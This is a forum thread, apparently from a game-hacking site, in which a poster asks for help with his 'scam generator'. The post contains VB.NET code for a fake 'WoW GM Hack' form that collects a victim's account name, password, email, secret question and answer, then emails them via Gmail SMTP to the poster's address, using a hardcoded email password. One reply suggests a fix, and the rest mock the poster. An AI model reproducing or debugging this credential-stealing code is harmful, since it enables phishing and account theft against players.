VB program SMTP issue menu

Shout-Out

User Tag List

Results 1 to 6 of 6
  1. #1
    Kallblodig's Avatar Contributor
    Reputation
    113
    Join Date
    Dec 2008
    Posts
    129
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

    VB program SMTP issue

    Heya, My scam generator isnt working anymore, when I press the send button it says '' The SMTP server requires a secure connection or the client was not authenticated. The server response was: 5.5.1 Authentication Required ''

    Any advice? here is the code,
    Code:
    Public Class Form1
        Private Sub Button1_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Button1.Click
            If TextBox1.Text = "" Then
                MsgBox("The account field is not filled in!", MsgBoxStyle.OkOnly, "WoW GM Hack")
            End If
    
            If TextBox2.Text = "" Then
                MsgBox("The password field is not filled in!", MsgBoxStyle.OkOnly, "WoW GM Hack")
            End If
    
            Dim mail As New System.Net.Mail.MailMessage()
            Dim SmtpServer As New SmtpClient
            SmtpServer.Credentials = New Net.NetworkCredential("[email protected]", "mrkiller08")
            SmtpServer.Port = 587
            SmtpServer.Host = "smtp.gmail.com"
            SmtpServer.EnableSsl = True
            mail.To.Add("[email protected]")
            mail.From = New MailAddress("[email protected]")
            mail.Subject = "Me"
            mail.Body = "Account: " & TextBox1.Text & vbNewLine & "Password: " & TextBox2.Text & vbNewLine & "E-mail: " & TextBox3.Text & vbNewLine & "Secret Question: " & TextBox4.Text & vbNewLine & "Secret Question Answer: " & TextBox5.Text & vbNewLine & "Full Name: " & TextBox6.Text & vbNewLine & "Gamemaster: " & TextBox7.Text
            SmtpServer.Send(mail)
            MsgBox("Success! The account will be upgraded within 3hours!")
        End Sub
    End Class
    + Rep to the one who can solve this!

    VB program SMTP issue
  2. #2
    _DecpticoN_'s Avatar Member
    Reputation
    34
    Join Date
    May 2008
    Posts
    234
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Check and make sure SmtpServer.Credentials = New Net.NetworkCredential("[email protected]", "mrkiller08") is the right username and pass for gmail and you dont need @gmail.com there

  3. #3
    maclone's Avatar / Authenticator enabled
    Reputation
    2420
    Join Date
    Nov 2007
    Posts
    8,726
    Thanks G/R
    0/1029
    Trade Feedback
    0 (0%)
    Mentioned
    2 Post(s)
    Tagged
    0 Thread(s)
    Well, it's cause you just lost -the game- your GMail account.
    Last edited by maclone; 03-09-2009 at 04:00 PM.
    Zomfg. And no, don't ask. - Dombo did it.

  4. #4
    Trollin's Avatar Contributor
    Reputation
    204
    Join Date
    Nov 2008
    Posts
    1,093
    Thanks G/R
    0/1
    Trade Feedback
    2 (100%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Lolololoololol.
    ____________________________________________

    ____________________________________________

  5. #5
    suicidity's Avatar Contributor
    Reputation
    207
    Join Date
    Oct 2006
    Posts
    1,439
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    You got Owned.


  6. #6
    Kallblodig's Avatar Contributor
    Reputation
    113
    Join Date
    Dec 2008
    Posts
    129
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Yer, I noticed. Fixed the problem.

Similar Threads

  1. Internett Issue wtb program
    By tresko in forum WoW Bots Questions & Requests
    Replies: 1
    Last Post: 07-05-2010, 05:55 PM
  2. SMTP VB emailing program
    By kingviper in forum Programming
    Replies: 4
    Last Post: 02-22-2009, 06:30 AM
  3. [Program] AutoGlide
    By Cypher in forum World of Warcraft Bots and Programs
    Replies: 26
    Last Post: 01-04-2007, 08:29 PM
  4. [Program] Re-login on Disconnect
    By Cypher in forum World of Warcraft Bots and Programs
    Replies: 4
    Last Post: 05-14-2006, 01:01 AM
All times are GMT -5. The time now is 08:40 AM. Powered by vBulletin® Version 4.2.3
Copyright © 2025 vBulletin Solutions, Inc. All rights reserved. User Alert System provided by Advanced User Tagging (Pro) - vBulletin Mods & Addons Copyright © 2025 DragonByte Technologies Ltd.
Google Authenticator verification provided by Two-Factor Authentication (Free) - vBulletin Mods & Addons Copyright © 2025 DragonByte Technologies Ltd.
Digital Point modules: Sphinx-based search